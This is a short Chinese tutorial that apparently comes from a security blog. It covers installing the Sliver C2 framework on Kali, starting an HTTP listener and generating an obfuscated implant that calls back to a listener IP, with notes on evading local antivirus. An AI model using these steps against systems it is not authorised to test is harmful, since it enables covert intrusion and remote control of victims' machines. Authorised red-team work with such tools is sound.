在前面的文章中，我们讲到了很多渗透框架如Empire CS Msfconsole等等。他们都有各自的优点和缺点，但是他们共同的缺点就是免杀不是很好。有没有一款工具，既能实现团队协作，又能做到很好的免杀呢？

关于Sliver C2

Sliver 是一个基于Go的开源、跨平台的红队平台，可供各种规模的组织用于执行安全测试。Sliver 的支持 C2 over Mutual-TLS、HTTP(S) 和 DNS等协议。implant可以时时编译生成，并会使用证书进行加密。服务器和客户端以及implant都支持MacOS、Windows 和 Linux。如何在Kali Linux服务器上安装BishopFox的Sliver C2框架呢？

在kali中安装

源码安装

curl https://sliver.sh/install|sudo bash

可能由于网络等因素，下载比较慢。我们可以访问下面页面，直接下载编译好的。

https://github.com/BishopFox/sliver/releases

下载Linux服务器端

运行

sliver运行需要配置一些环境变量，如go、gcc，方便生成木马时候进行编译，在kali下运行十分简单，因为kali已经内置了这些变量。只需执行命令sliver-server_linux即可。

快速上手

配置一个基于http的监听

http -l 8888

生成一个基于http的c2 shell

generate --http http://192.168.123.23:8888

sliver之前的版本使用的gobfuscate，在源码层面修改变量以及代码结构，速度比较慢，相比之下garble是对中间编译环节进行混淆结构，速度比较快也能混淆大部分符号等信息。当然免杀效果也肯定很好。当然生成的文件也比较大约为17M

运行生成的exe文件，成功得到会话。

进入当前会话

use id

免杀测试

需要注意，360云查杀可以扫描出来。本地杀毒没有问题。至于云查杀，我们在后面的在做谈论。

其他

sliver的其他玩法，我们会在后面的文章中继续更新。感兴趣的小伙伴们点赞收藏吧。

更多精彩文章 欢迎关注我们